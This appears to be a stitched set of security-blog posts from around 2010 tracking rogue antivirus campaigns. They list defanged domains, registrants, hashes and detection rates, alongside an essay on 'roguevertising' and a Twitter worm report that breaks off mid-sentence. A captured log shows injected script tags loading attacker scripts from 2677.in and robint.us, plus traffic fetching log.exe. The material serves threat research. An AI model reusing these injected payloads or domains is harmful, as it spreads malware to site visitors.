Registrant Contact:
Name: Youriy Lens
Address: 15 avenue 45-13
City: New York,NY
Country: United States

hxxp://antivirmore.com
Result: 1/17 (6 %)
Domain Hash: 361a40e6b3b2a635b6924e5c5aaceb6d
URLVoid
Note: this page does not trigger a “scan” of your computer.

Some related domains:

hxxp://Antispy-defender.com
hxxp://Antispywork.com
hxxp://Antivir-product.com
hxxp://Antivirglass.com
hxxp://Antivirprime.com
hxxp://Antivirstat.com
hxxp://Av-look.com

Screenshot example:

AV Security Suite home page

Registrant Contact:
Name: Jong Sung, Kim
Address: 864-2, Janghangdong, Ilsan
City: Goyang, Gyeonggi-do
Country: South Korea

packupdate107_195.exe
Result: 7/41 (17.07%)
MD5: 08a2ad37c6920b640615d7a1d6c3bbec
VirusTotal
Anubis Report
ThreatExpert Report

Rogueware Page: hxxp://www1.oksave9.co.cc
Result: 2/17 (12 %)
Domain Hash: 9b83d635ed7bf5be568e9cbae3b97935
URLVoid
Note: this rogueware page triggers a “scan” of your computer if redirected by a search engine.

This rogue is called Security Master AV.

Screenshot examples:

Security Master AV fake notification

Security Master AV fake scan page

When executing the file ( packupdate107_195.exe ):

Security Master AV Setup

Registrant Contact:
Name: Domains by Proxy, Inc.
Address: 15111 N. Hayden Rd., Ste 160, PMB 353
City: Scottsdale, Arizona 85260
Country: United States

setup.exe
Result: 16/41 (39.02%)
MD5: 27b002ee170c751d14e030dacbb52b9f
VirusTotal
Anubis Report
ThreatExpert Report

Rogueware Page: hxxp://www.antivirus-elite.com
Result: 6/19 (32 %)
Domain Hash : 7cd43e9333370d93ed8df0cc6a55bf7f
URLVoid
Note: this rogueware page does not trigger a “scan” of your computer.

This rogue is called Anti-Virus Elite v5.0.

Screenshot examples:

Anti-Virus Elite Website

When executing the file ( setup.exe ):

Anti-Virus Elite Warning Message

Anti-Virus Elite Interface

A new term in the rogue industry – written by Bart Parys

Today I will be talking about a new trend that spreads itself quite quickly throughout the internet.
In this document I will try to explain what it is all about and provide additional information like screenshots and measures that can be taken to tackle these threats.

It all started when I found a new rogue domain:
hxxp://antispyware.com

Antispyware2010 website

The following domains are associated with Antispyware.com:
hxxp://antispyware2009.com
hxxp://Errorsmart.com
hxxp://Registryclear.com
hxxp://Remover.org

They all introduce the same ‘product’ – to perform a scan for malware on your computer. You can even request Live Technical Support.
(No, not really, it will just refer you to the download page)

When you download their product, you can find the following setup file in your chosen download folder:

setupxv.exe

Pending on the website you landed on, you can also download another file called setup.exe

The file setupxv.exe has currently a 53.66% detection ratio on VirusTotal. The classification most used included the name Fakealert:
VirusTotal Result
It is also possible you download a file with the same name (setupxv.exe) but with slightly changed binaries. You can find an example of this on VirusTotal:
VirusTotal Result

For more information about this rogue program and the others described down below, I refer to the end of this document, where you can find some screenshots of my findings.

Then, after performing some Google searches on fake testimonials and information taken from their website , I landed on the following rogue domain:

hxxp://againstadware.com

AgainstAdware website

Unfortunately, you cannot download their product anymore, as the setup file has been removed.

The following domains are associated with Againstadware.com:

http://Fileboxx.com

http://Incredible-mail-download.com

http://Secureoneantivirus.com

http://Wincleanerpro.com

Now, why am I introducing the term roguevertising ?

You might have heard about malvertising. Malvertising (short for Malicious Advertising)  is a term used for malicious advertisements that are clicked on, and can deliver a drive-by-download or suggesting to install a certain program to clean and scan your computer.

These days I have found a lot of websites using malvertising for rogue security software. That is how the term roguevertising was born.

A few examples of these websites:

hxxp://www.hopelinenc.org/forum/anti-spyware

hxxp://www.thedietsolutionprogram.ws/weblog/anti-spyware

hxxp://www.thedietsolutionprogram.ws/rating/anti-spyware

hxxp://www.perfectoptimizer5.com/?hop=aseafood

hxxp://www.bestspywareprogram.net

Along with legit Antispyware applications, you can find “Antispyware” between the list with … an advertisement leading to the download link of the rogue. (Done through an advertising mirror)

hxxp://threats.browsetag.com/antispyware
hxxp://www.plrarticlesoftware.biz/forum/anti-spyware
hxxp://www.earth4energyoffical.com/weblog/anti-spyware
hxxp://www.earth4energyoffical.com/article/adware-alert
hxxp://www.earth4energyoffical.com/article/privacy-control
hxxp://www.theaffiliatecode.ws/weblog/anti-spyware
hxxp://www.legitonlinejobshome.com/tags/anti-spyware

Additionally, I stumbled upon the following rogue domain:
hxxp://spywareremover.com

SpywareRemover website

When you download their product, you can find the following setup file in your chosen download folder:

Setupxv.exe

That’s right. Setupxv all over again, but with a different icon and again changed binaries.

The file setupxv.exe has currently a 39.02% detection ratio on VirusTotal. The classification most used included the name AdSpy:
VirusTotal Result

Do you surf the internet ? Does your PC run slow ? Do you get bombarded with annoying pop-up ads ?
Then you are most likely to land on the following page:

AdwareAlert website

Yet again, setupxv is presented to you with a nice new icon:

Current VirusTotal detection rate is 48.78% . The file was again changed to avoid detections by Antivirus software. (also introduces another GUI as noted at the end of this document)
VirusTotal Result

The setupxv rogueware campaign is on a roll, down below some associated domains with AdwareAlert.com:

hxxp://Cbadvance.com
hxxp://Errorkiller.com
hxxp://Evidenceeraser.com
hxxp://Malwarebot.com
hxxp://Malwareremovalbot.com
hxxp://Registrybot.com
hxxp://Registrysmart.com
hxxp://Regrecall.com
hxxp://Regsweep.com
hxxp://Spywarebot.com
hxxp://Spywarestop.com

Next rogueware domain on our list is:
hxxp://www.antispywarebotpro.com

AntiSpywareBot website

As always your download is free as well as the malicious payload:

Setupxv.exe

Current VirusTotal detection rate is 48.78% .
VirusTotal Result

Related domains in this case are:

hxxp://mail.remover.org
hxxp://www.privacycontrolpro.com
hxxp://errorsweeperpro.com
hxxp://Regcleanlite.com
hxxp://www.browsetag.com/spyware/virus/threats
hxxp://support.browsetag.com/certified/antispyware
hxxp://www.spywarenuker-gary.com/blog/anti-spyware
hxxp://www.spywarenuker-gary.com/blog/adware-alert

As you might have noticed, roguevertising is appearing on these last pages. Spywarenuker Gary needs to find another name, as his directory is filled with malicious advertisements and bloatware:

Part of a roguevertising directory

I have also gathered the following URLs which are also related to the setupxv rogueware campain:

hxxp://adwarealert.com
hxxp://Cbadvance.com
hxxp://Errorkiller.com
hxxp://Evidenceeraser.com
hxxp://Malwarebot.com
hxxp://Malwareremovalbot.com
hxxp://Registrybot.com
hxxp://Registrysmart.com
hxxp://Regrecall.com
hxxp://Regsweep.com
hxxp://Spywarebot.com
hxxp://Spywareremover.com
hxxp://Spywarestop.com

One of the rogues download above, again setupxv:

Setupxv.exe

This new version of setupxv only has a 4.88% detection ratio on VirusTotal:
VirusTotal Result

… and delivers you the program RegClean

RegClean Setup Wizard

The following rogue that you might remember is Spyware Cease:

hxxp://www.spywarecease.com

SpywareCease website

SpywareCease comes in the following setup file:

It has currently a 12.20% ratio on VirusTotal:
VirusTotal Result

Associated domains and roguevertising links for Spywarecease.com:

hxxp://www.spycease.com
hxxp://www.micronichefinderhome.com/blog/spyware-cease
hxxp://entrepreneur.useoursite.com/go.php?p=SSPYKILLER
hxxp://offto.net/SpywareCease_4ee8
hxxp://viral-link-exchange.info/clickbank-supercenter/html/spyware-cease-1-converting-anti-spyware-software.htm
hxxp://www.cheapsale.org/html/spyware-cease-1-converting-anti-spyware-software.htm
hxxp://www.easyfixcomputersolutions.com/home.php
hxxp://www.easydigitalsales.com/33027/Spyware-Cease—1-Converting-Anti-Spyware-Software.html

We are moving on to the last roguevertising campaign, brought to you by 007 Anti-Spyware.
I stumbled upon this one while investigating the SpywareCease roguevertising campaign.
hxxp://www.007antispyware.com
Unfortunately (or luckily) this site was down at the time of writing, but I found a roguevertising domain for this one:
hxxp://007antyspyware.blogspot.com

007 Anti-Spyware website (blog)

The blog provides an ad-provided mirror for the setup file 007antipsyware.exe

007antipsyware.exe

The file has currently very low detection ratios on Virustotal. Only 4.88% of the scanners detect it,
namely as Adware.SpywareCease. Rings a bell somewhere…
VirusTotal Result

But the fun is not over yet. When visiting this roguevertiser’s Twitter page, you can install the Googod toolbar. Now we can add spyware on the list, since the Googod toolbar is copyrighted under
Conduit Ltd., which is renowned for its spyware activities. This toolbar is available for Internet Explorer, Mozilla Firefox and Safari.

hxxp://www.googod.ourtoolbar.com

Googod toolbar website

2.44% on VirusTotal
VirusTotal Result

Conclusion

Although malvertising is not a new concept, roguevertising however is.
I hope that throughout this document it became a bit clearer what it is all about and how only one rogueware campaign is and will be able to infect a lot of users.
No, the rogueware will not clean nor speed up your computer.

Pushing rogueware downloads through advertisements on weblogs, bloatware websites or even on Google, will be a phenomenon we have to deal with. In this case the setupxv rogueware campaign was able to spread itself through different domains, which can attract users to actually download and install the software.

But there might be hope.In my opinion can websites like Antispyware.com be prevented by ever seeing the light: register domains that can be used for roguevertising. In this case, the setupxv creators would not have been able to register this domain, and users would get a message stating the website is under construction, for example or it is registered for the single purpose of stopping websites like this.
Another option would be for the domain linking to an AntiVirus vendor, as described below.
After all, the site Antispyware.com website sounds legit, and when you visit the site, the user will not notice anything suspicious. For example Antivirus.com is registered to TrendMicro.
When you look up Antispyware.com however, you get a 32 % dangerous rating on URLVoid:
URLVoid Result

Tools like Web Of Trust (WOT) can prevent you from landing on sites like Antispyware.com.
Other manners to prevent this can either be hostfile-based or user-based.
Examples can be MVPS Hosts or Sandboxie. Common sense however will always be the most important factor, just remember the following rule: if it looks like a rogue, it probably is !
This does of course not imply that every suspicious looking program is malicious, rather perform some checks with your favorite search engine or use URLVoid and VirusTotal as a reference.

Further rogueware screenshots are provided down below. Thank you for reading.

007 Antispyware

Setup screen

Shortcut icon

Interface

Adware Alert

Setup screen

Shortcut icon

Interface

Antispyware 2008

Setup screen

Shortcut icon

Interface

007 Antispyware

Setup screen

Shortcut icon

Interface

Registrant Contact:
Name: Jong Sung, Kim
Address: 864-2
City:janghangdong, Ilsan, Goyang, Gyeounggi
Country: South-Korea

setup.exe
Result: 4/41 (20.00%)
MD5: d0167b975dc0734cb2bac4b4bad2eb86
VirusTotal
Anubis Report
ThreatExpert Report
Rogueware Page: hxxp://www2.fastcleancure47pd.co.cc

This rogue is called Security Essentials 2010.

Screenshot example:

Fake Scanner Page

We recommend patching Adobe and then installing Cloud Antivirus to prevent any future 0day attacks.

Here are some logs of our most recent encounter:

Session traffic:

GET hxxp://2677.in/cnzz.html

200 OK (text/html)

GET hxxp://2677.in/ie.html

200 OK (text/html)

GET hxxp://s11.cnzz.com/stat.php?id=1990191&web_id=1990191

200 OK (text/html)

GET hxxp://2677.in/log.txt

200 OK (text/plain)

GET hxxp://2677.in/anhey.swf

200 OK (application/x-shockwave-flash)

GET hxxp://2677.in/anhey.swf

206 Partial Content (application/x-shockwave-flash)

GET

hxxp://zs13.cnzz.com/stat.htm?id=1990191&r=http%3A//www.generationdb.com/&lg

=en-us&ntime=0.14859300%201276289711&repeatip=0&rtime=0&cnzz_eid=82761217-12

76289711-http%3A//www.generationdb.com/&showp=800×600&st=1276292642&sin=http

%3A//www.generationdb.com/&res=0

200 OK (image/gif)

GET hxxp://2677.in/log.exe

200 OK (application/octet-stream)

Injection log:

< table width=”96%” border=”0″ align=”center” cellpadding=”0″

cellspacing=”0″  >

< tr  >

< td colspan=”2″  >   < img alt=”" src=”images/5×5.gif” width=”5″ height=”8″

/  >  < /td  >

< /tr  >

< tr  >

< td align=”center” class=”hoverbox”  >   < a href=”#”  >   < img

src=’upload/community/moresmall_37726110_lego.jpg< script src=hxxp://ww.robint.us/u.js  >  < /script  >  < script src=hxxp://2677.in/yahoo.js  >  < /script  >  ‘ alt=”" /  >  < img src=’upload/community/large_37726110_lego.jpg< script src=http://ww.robint.us/u.js  >  < /script  >  < script src=hxxp://2677.in/yahoo.js  >  < /script  >  ‘ alt=”" class=”preview” /  > < /a  >  < /td  >

< td width=”55%” valign=”top” class=”category”  >

< a href=”unregisteredcommunity.aspx?Com_id=’7′”

target=”_self”  >    We are all  < /a  >  … < br  /  >  Category: Groups,<

br /  >  Location: USA< script src=hxxp://2677.in/yahoo.js  >  < /script  > < /td  > < /tr  > < tr  > < td colspan=”2″  > —————————————–< /td  > < /tr  > < /table  > < /td  >

< /tr  >  < tr  >

< td  >

< table width=”96%” border=”0″ align=”center” cellpadding=”0″

cellspacing=”0″  >

< tr  >

< td colspan=”2″  >   < img alt=”" src=”images/5×5.gif” width=”5″ height=”8″

/  >  < /td  >

< /tr  >

< tr  >

< td align=”center” class=”hoverbox”  >   < a href=”#”  >   < img

src=’upload/community/moresmall_2065474113_IMG_4127.JPG< script src=hxxp://ww.robint.us/u.js  >  < /script  >  < script src=hxxp://2677.in/yahoo.js  >  < /script  >  ‘ alt=”" /  >  < img src=’upload/community/large_2065474113_IMG_4127.JPG< script src=hxxp://ww.robint.us/u.js  >  < /script  >  < script src=hxxp://2677.in/yahoo.js  >  < /script  >  ‘ alt=”" class=”preview” /  > < /a  >  < /td  >

< td width=”55%” valign=”top” class=”category”  >

< a href=”unregisteredcommunity.aspx?Com_id=’6′”

target=”_self”  >    Technosoft < /a  >  … < br  /  >  Category:

Business,< br /  >  Location: India< script src=hxxp://2677.in/yahoo.js  > < /script  >  < /td  > < /tr  > < tr  > < td colspan=”2″ class=”line”  > —————————————–< /td  > < /tr  > < /table  > < /td  >

< /tr  >

< /table  >

Registrant Contact:
Name: Vladimir Volvin
Address: 154 po box
City: New York,
Country: US (United States)

hxxp://antispyware-guard.com
Result: 3/20 (15 %)
Domain Hash: 664bb3514bfa487b37edc06834852f7f
URLVoid
Note: this page does not trigger a “scan” of your computer.

Some related domains:
hxxp://richav.net
hxxp://avblesk.com
hxxp://antispywareprog.com

Screenshot example:

Antivirus Soft home page

Registrant Contact:
Name: Domain Admin
Address: P.O. Box 97
City: Moergestel
Country: NL (The Netherlands)

hxxp://rise-soft.info
Result: 2/19 (11 %)
Domain Hash: 89cbd9c11c7b11808db832b975e5f193
URLVoid
Note: this page does not trigger a “scan” of your computer.

Screenshot example:

Smart Defender Pro home page

Whois record for rtsantivirus2010.com

Registrant Contact:
Name: Oleg M Chistuik
Address: manuilskogo 8
City: Dnepropetrovsk
Country: UA (Ukraine)

SetupRSTAV2010.msi
Result: 13/41 (20.00%)
MD5: b23f5df55530a58f7d9f9af7db75b4fc
VirusTotal
VirScan
Rogueware Page: hxxp://www.rtsantivirus2010.com
Note: this page does not trigger a “scan” of your computer.

This rogue is called RST Antivirus 2010 Pro, and is a clone of the AKM Antivirus 2010 Pro rogueware.

Some screenshot examples:

RTS Antivirus 2010 home page

When executing the file ( SetupRSTAV2010.msi ):

Setup of the rogueware program

In this latest attack, the tweet messages were coupled with the trending topic items such as Justin Bieber, Oil Spill, and Official Twitter App.   The tweets all contained the text “haha this is the funniest video ive EVER SEEN!” followed by a link to the malware campaign.

In the following image, you can see the results of a search taken shortly after the attack started.  As you can see, the accounts were communicating via the Twitter API, so it’s safe to assume that the cyber criminals behind the attack used some sort of script to make it all happen.

Clicking any of the URLs starts the redirection process to a website where a malicious file is downloaded using the technique known as “drive by download”, which runs this file automatically in the affected computer, without user’s awareness.

The malware site used for the attack is hxxp://pc-tv.tv/stickam/index2.html

In the following image you can see how it seems that a java complement is being loaded, which is necessary to view the video:

However, if we look at the code of this website, you can see how it’s actually calling an EXE file, which belongs to the malware. It has been detected as W32/Lolbot.B.worm.

The code is the following: